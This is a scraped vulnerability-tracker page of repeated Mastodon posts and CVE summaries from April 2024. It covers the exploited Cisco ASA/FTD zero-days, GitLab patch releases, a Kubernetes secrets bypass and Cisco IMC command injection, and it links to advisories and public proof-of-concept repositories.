#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-24T16:53:30.000Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

##

screaminggoat@infosec.exchange at 2024-04-24T16:11:54.000Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC

##

H3liumb0y at 2024-04-25T07:25:30.414Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

##

H3liumb0y@infosec.exchange at 2024-04-25T07:25:30.000Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

##

jos1264@social.skynetcloud.site at 2024-04-24T20:55:04.000Z ##

ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) fortiguard.fortinet.com/threat

##

jos1264@social.skynetcloud.site at 2024-04-24T18:45:04.000Z ##

Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) helpnetsecurity.com/2024/04/24 #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC

##

screaminggoat at 2024-04-24T16:34:11.579Z ##

@GossiTheDog Here are the CVE security advisories:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
##

GossiTheDog@cyberplace.social at 2024-04-24T16:19:22.000Z ##

🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year

CVE-2024-20353 and CVE-2024-20359

blog.talosintelligence.com/arc

#threatintel #ArcaneDoor

##

screaminggoat@infosec.exchange at 2024-04-24T16:34:11.000Z ##

@GossiTheDog Here are the CVE security advisories:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
##

GossiTheDog@cyberplace.social at 2024-04-24T16:19:22.000Z ##

🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year

CVE-2024-20353 and CVE-2024-20359

blog.talosintelligence.com/arc

#threatintel #ArcaneDoor

##

CVE-2024-4006
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-04-25T15:30:45

4 posts

An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.7 before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1 where personal access scopes were not honored by GraphQL subscriptions

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

CVE-2024-4024
(7.3 HIGH)

EPSS: 0.04%

updated 2024-04-25T15:30:38

4 posts

An issue has been discovered in GitLab CE/EE affecting all versions starting from 7.8 before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1. Under certain conditions, an attacker with their Bitbucket account credentials may be able to take over a GitLab account linked to another user's Bitbucket account, if Bitbucket is used as an OAuth 2.0

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

CVE-2024-1347
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-04-25T12:30:56

4 posts

An issue has been discovered in GitLab CE/EE affecting all versions before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1. Under certain conditions, an attacker through a crafted email address may be able to bypass domain based restrictions on an instance or a group.

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

CVE-2024-2829
(7.5 HIGH)

EPSS: 0.04%

updated 2024-04-25T12:30:51

4 posts

An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.5 before 16.9.6, all versions starting from 16.10 before 16.10.4, all versions starting from 16.11 before 16.11.1. A crafted wildcard filter in FileFinder may lead to a denial of service.

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

CVE-2024-2434
(8.5 HIGH)

EPSS: 0.04%

updated 2024-04-25T12:30:50

4 posts

An issue has been discovered in GitLab affecting all versions of GitLab CE/EE 16.9 prior to 16.9.6, 16.10 prior to 16.10.4, and 16.11 prior to 16.11.1 where path traversal could lead to DoS and restricted file read.

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

screaminggoat at 2024-04-26T16:49:09.826Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

##

screaminggoat@infosec.exchange at 2024-04-26T16:49:09.000Z ##

GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:

  • CVE-2024-4024 (7.3 high) GitLab account takeover, under certain conditions, when using Bitbucket as an OAuth provider
  • CVE-2024-2434 (8.5 high) Path Traversal leads to DoS and Restricted File Read
  • CVE-2024-2829 (7.5 high) Unauthenticated ReDoS in FileFinder when using wildcard filters in project file search
  • CVE-2024-4006 (7.3 high) Personal Access Token scopes not honoured by GraphQL subscriptions
  • CVE-2024-1347 (4.3 medium) Domain based restrictions bypass using a crafted email address

#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347

##

CVE-2024-3177
(2.7 LOW)

EPSS: 0.04%

updated 2024-04-25T06:16:00.237000

2 posts

A security issue was discovered in Kubernetes where users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using containers, init containers, and ephemeral containers with the envFrom field populated. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secr

1 repos

https://github.com/FreySolarEye/Exploit-CVE-2024-31777

CVE-2024-20295
(8.8 HIGH)

EPSS: 0.04%

updated 2024-04-24T21:32:04

2 posts

A vulnerability in the CLI of the Cisco Integrated Management Controller (IMC) could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have read-only or higher privileges on an affected device. This vulnerability is due to insufficient validation of user-sup

simontsui@infosec.exchange at 2024-04-17T17:00:24.000Z ##

Cisco released 3 security advisories:

  • CVE-2024-20356 (8.7 high) Cisco Integrated Management Controller Web-Based Management Interface Command Injection Vulnerability
  • CVE-2024-20373 (5.3 medium) Cisco IOS and IOS XE Software SNMP Extended Named Access Control List Bypass Vulnerability
  • CVE-2024-20295 (8.8 high) Cisco Integrated Management Controller CLI Command Injection Vulnerability

Please note that a proof of concept was publicly disclosed for CVE-2024-20295 before it was patched, making this a zero-day. The Cisco PSIRT is not aware of any malicious use of the vulnerabilities that were described in these advisories. But don't take my word for it, go check them out yourself.

#Cisco #PatchTuesday #zeroday #proofofconcept #CVE_2024_20356 #CVE_2024_20373 #CVE_2024_20295

##

simontsui@infosec.exchange at 2024-04-17T16:16:23.000Z ##

Cisco zero-day (PoC publicly disclosed): Cisco Integrated Management Controller CLI Command Injection Vulnerability CVE-2024-20295 (8.8 high) 🔗 sec.cloudapps.cisco.com/securi

A vulnerability in the CLI of the Cisco Integrated Management Controller (IMC) could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have read-only or higher privileges on an affected device.

This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root.

The Cisco PSIRT is aware that proof-of-concept exploit code is available for the vulnerability that is described in this advisory.

#zeroday #proofofconcept #vulnerability #Cisco #vulnerability #CVE_2024_20295

##

CVE-2024-20356
(8.7 HIGH)

EPSS: 0.04%

updated 2024-04-24T21:31:56

11 posts

A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker with Administrator-level privileges to perform command injection attacks on an affected system and elevate their privileges to root. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by sendin

1 repos

https://github.com/nettitude/CVE-2024-20356

decio at 2024-04-23T09:01:16.415Z ##

IMO on tient ici un des plus beaux descriptifs/blog post technique de l'année sur l'exploitation de la vulnérabilité CVE-2024-20356 (web-GUI Cisco IMC ) :

✅ Complet
✅ Précis
🛠️ Toolkit disponible sur GitHub
😄 ...et amusant !

𝕮𝖆𝖓 𝖎𝖙 𝖗𝖚𝖓 𝕯𝖔𝖔𝖒?

(constat: ces "appliances" sont de vrais 🧀 )
👇
labs.nettitude.com/blog/cve-20

##

Polynomial_C@mastodon.social at 2024-04-22T18:23:28.000Z ##

labs.nettitude.com/blog/cve-20

"Jailbreaking a Cisco appliance to run DOOM"

##

campuscodi@mastodon.social at 2024-04-21T11:50:32.000Z ##

Researchers at Nettitude Labs have published a write-up and PoC for CVE-2024-20356.

This is a command injection vulnerability in the web interface of the Cisco IMC servers that can be used by authenticated attackers to gain root privileges on the device.

Nettitude used the bug to install and play DOOM on the device. Cisco patched the vulnerability last week.

labs.nettitude.com/blog/cve-20

github.com/nettitude/CVE-2024-

sec.cloudapps.cisco.com/securi

##

raptor at 2024-04-20T16:07:30.672Z ##

CVE-2024-20356: Jailbreaking a appliance to run DOOM

labs.nettitude.com/blog/cve-20

github.com/nettitude/CVE-2024-

##

keen456 at 2024-04-18T20:15:41.620Z ##

@foone
labs.nettitude.com/blog/cve-20

##

decio@infosec.exchange at 2024-04-23T09:01:16.000Z ##

IMO on tient ici un des plus beaux descriptifs/blog post technique de l'année sur l'exploitation de la vulnérabilité CVE-2024-20356 (web-GUI Cisco IMC ) :

✅ Complet
✅ Précis
🛠️ Toolkit disponible sur GitHub
😄 ...et amusant !

𝕮𝖆𝖓 𝖎𝖙 𝖗𝖚𝖓 𝕯𝖔𝖔𝖒?

(constat: ces "appliances" sont de vrais 🧀 )
👇
labs.nettitude.com/blog/cve-20

##

Polynomial_C@mastodon.social at 2024-04-22T18:23:28.000Z ##

labs.nettitude.com/blog/cve-20

"Jailbreaking a Cisco appliance to run DOOM"

##

campuscodi@mastodon.social at 2024-04-21T11:50:32.000Z ##

